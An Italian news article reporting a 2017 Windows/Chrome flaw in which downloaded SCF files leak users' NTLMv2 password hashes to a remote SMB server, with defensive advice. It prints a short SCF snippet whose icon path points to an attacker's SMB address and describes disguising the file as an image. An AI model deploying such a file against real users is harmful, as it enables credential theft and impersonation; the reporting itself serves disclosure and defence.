Come rubare le credenziali di Windows usando Chrome

Una falla consente agli hacker di sottrarre nome utente e password sfruttando il browser di Google.



[ZEUS News - www.zeusnews.it - 18-05-2017]

windows password chrome

Windows e Google Chrome sono un'accoppiata piuttosto popolare ma, stando a quanto ha rivelato Bosko Stankovic, anche pericolosa.

Stankovic, che si occupa di sicurezza per DefenseCode, ha scoperto che è possibile usare Chrome per rubare la password di Windows grazie a una falla nel sistema operativo.

Tutto ciò che un malintenzionato deve fare è convincere la propria vittima a visitare un sito che contenga un file SCF (Windows Explorer Shell Command File), un formato che risale ai tempi di Windows 98.

In sostanza, un file SCF è un file di testo con una sessione che indica il comando da eseguire e l'indicazione dell'icona da adottare, completa del percorso per recuperarla. Il contenuto è generalmente di questo tipo:

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

Il problema è l'icona: generalmente l'indicazione della posizione si riferisce a un file locale, ma si può indicare anche un server SMB remoto col quale Windows tenterà automaticamente l'autenticazione non appena l'utente tenterà di visualizzare il file scaricato, anche semplicemente aprendo la cartella con Windows Explorer.

Il malintenzionato ha bisogno soltanto che nel file SCF scaricato dalla vittima ci sia un contenuto simile al seguente:

[Shell]
IconFile=\\170.170.170.170\icon

Ovviamente, l'indirizzo remoto indicato deve essere quello del server SMB predisposto in ascolto.

Durante il tentativo automatico di autenticazione da parte del PC delle vittima, l'autore del file SCF può carpire il nome utente e l'hash NTLMv2 della password, per poi tentare di craccarlo in seguito oppure «per usarlo per accedere a servizi online che adoperino lo stesso tipo di autenticazione (per esempio Microsoft Exchange)» per impersonare la vittima senza nemmeno conoscere la password.

Tale tecnica d'attacco non è veramente nuova: è stata usata a suo tempo dal famigerato Stuxnet, che però per diffondersi adoperava i file LNK.

Proprio a causa di Stuxnet, Chrome è stato attrezzato per proteggere gli utenti dai file LNK, ma non dagli SCF. Inoltre, da allora Microsoft ha imposto ai file LNK di cercare l'icona soltanto nelle risorse locali.

Sondaggio
Vuoi scaricare la canzone 'Yesterday' dei Beatles; esistono varie opzioni su Internet. Quale file scarichi tra i seguenti?
Yesterday-Beatles-Song.scr
Beatles_All_songs.zip
Beatles_Yesterday.mp3.exe
Betles-Yesturday.wma

Mostra i risultati (993 voti)
Leggi i commenti (10)

«Impostare la posizione dell'icona a un server SMB remoto» - spiega Stankovic - «è un noto vettore d'attacco che sfrutta il sistema di autenticazione automatica di Windows quando si cerca di accedere a servizi come la condivisione di file remota».

C'è un ulteriore dettaglio da considerare: il ricercatore ricorda che in Windows Explorer i file SCF appaiono sempre senza l'indicazione dell'estensione, indipendentemente dalle impostazioni.

Ciò significa che «un file chiamato immagine.jpg.scf apparirà in Windows Explorer come immagine.jpg» e verrà quindi scambiato per un'innocua fotografia.

Allo stato attuale, tutte le versioni di Windows, compreso Windows 10, sono vulnerabili.

Per difendersi dall'attacco gli utenti possono disabilitare le connessioni SMB in uscita (porte TCP 139 e 445) dalla rete locale, agendo sulle impostazioni del firewall.

Secondo Stankovic, inoltre, è una buona idea disabilitare il download automatico in Google Chrome: in tal modo qualsiasi tentativo di download dovrà essere approvato dall'utente, che potrà rendersi conto di ogni comportamento sospetto.

Google, intanto, ha fatto sapere di stare lavorando su una patch.

Se questo articolo ti è piaciuto e vuoi rimanere sempre informato con Zeus News ti consigliamo di iscriverti alla Newsletter gratuita. Inoltre puoi consigliare l'articolo utilizzando uno dei pulsanti qui sotto, inserire un commento (anche anonimo) sotto o segnalare un refuso.
© RIPRODUZIONE RISERVATA

Approfondimenti
Se la spia del computer fa la spia
Il malware che attacca le reti elettriche
I quindici malware più pericolosi della storia
Chiavetta USB con Stuxnet infettò centrale nucleare iraniana
Tecniche di guerra digitale: Stuxnet
Symantec: Stuxnet cova nell'ombra
Microsoft propone la quarantena per i PC infetti

Commenti all'articolo (1)

Più che "finestra", dovevano chiamarlo "Zanzariera" questo OS.
21-5-2017 07:29

La liberta' di parola e' un diritto inviolabile, ma nei forum di Zeus News vige un regolamento che impone delle restrizioni e che l'utente e' tenuto a rispettare. I moderatori si riservano il diritto di cancellare o modificare i commenti inseriti dagli utenti, senza dover fornire giustificazione alcuna. Gli utenti non registrati al forum inoltre sono sottoposti a moderazione preventiva. La responsabilita' dei commenti ricade esclusivamente sui rispettivi autori. I principali consigli: rimani sempre in argomento; evita commenti offensivi, volgari, violenti o che inneggiano all'illegalita'; non inserire dati personali, link inutili o spam in generale.
E' VIETATA la riproduzione dei testi e delle immagini senza l'espressa autorizzazione scritta di Zeus News (P.Iva 06584100967). Tutti i marchi e i marchi registrati citati sono di proprietà delle rispettive società. Informativa sulla privacy. I tuoi suggerimenti sono di vitale importanza per Zeus News. Contatta la redazione e contribuisci anche tu a migliorare il sito: pubblicheremo sui forum le lettere piu' interessanti.
Sondaggio
Secondo te in quale settore si faranno sentire maggiormente gli effetti positivi dell'Agenda Digitale?
La comunicazione
La scuola
L'accesso alle informazioni e ai contenuti culturali
La modalità di interazione con la Pubblica Amministrazione
Il Servizio Sanitario
La qualità dell'ambiente e dell'aria
La qualità della vita
Il costo della vita
La vivibilità delle grandi metropoli con la creazione di Smart City
La trasparenza
Risparmi per lo Stato e per il cittadino
Riduzione del digital divide
L'Agenda... de che?

Mostra i risultati (902 voti)
Maggio 2017
Il bug di Ntfs che manda in crash Windows
Il malware che si nasconde nei sottotitoli
Usare il Wi-Fi per vedere attraverso i muri
Più di 2.000 dollari per un Bitcoin
Blue Whale, mito di morte pericolosamente gonfiato
Wannacry una settimana dopo: il punto della situazione
1250 modelli di telecamere di sicurezza vulnerabili da remoto
Come rubare le credenziali di Windows usando Chrome
Ma è credibile tutto questo?
Cosa posso fare per difendermi?
Il keylogger nascosto nei portatili di HP
Mozilla scarica Thunderbird
Prende l'iPhone per rispondere e gli esplode in mano
Google svela l'interfaccia di Fuchsia, il successore di Android
Tablet, sempre meno vendite: faranno la fine dei netbook?
Tutti gli Arretrati


web metrics